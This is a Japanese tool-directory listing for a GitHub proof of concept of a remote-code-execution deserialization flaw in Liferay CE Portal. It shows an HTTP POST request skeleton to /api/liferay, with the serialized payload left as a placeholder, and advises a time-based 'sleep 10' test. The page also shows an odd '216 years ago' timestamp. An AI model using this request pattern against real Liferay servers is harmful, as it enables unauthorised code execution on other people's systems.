Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Liferay-CE-Portal-Java-Deserialization — このリポジトリには、Liferay CE Portalのリモートコード実行(RCE)脆弱性のPoCが含まれています! | Kitploit
ツール/GitHubGitHub/0x45dd/liferay-ce-portal-java-deserialization
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHub0x45dd/liferay-ce-portal-java-deserialization

Liferay-CE-Portal-Java-Deserialization

このリポジトリには、Liferay CE Portalのリモートコード実行(RCE)脆弱性のPoCが含まれています!

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
216年前未レビュー

Liferay-CE-Portal-Java-Deserialization

このリポジトリには、Liferay CE Portal のリモートコード実行の脆弱性に対する PoC が含まれています。

ペイロード

ペイロードはすでにリポジトリに共有しています。正しい構文はブルートフォース方式で見つける必要があります。共有したペイロードは、時間ベースの概念実証 (sleep 10) 用です。アプリケーションが常にコマンドを出力するとは限りません。そのため、PoC を行う際は時間ベースのペイロードを試すべきです。

概念実証

  • POST /api/liferay HTTP/1.1
  • Host: TARGET
  • User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0)
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9
  • Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
  • Accept-Encoding: gzip, deflate
  • Connection: close

ROME-PAYLOAD-FILE

PoC の例 (sleep 10)

ツールをダウンロード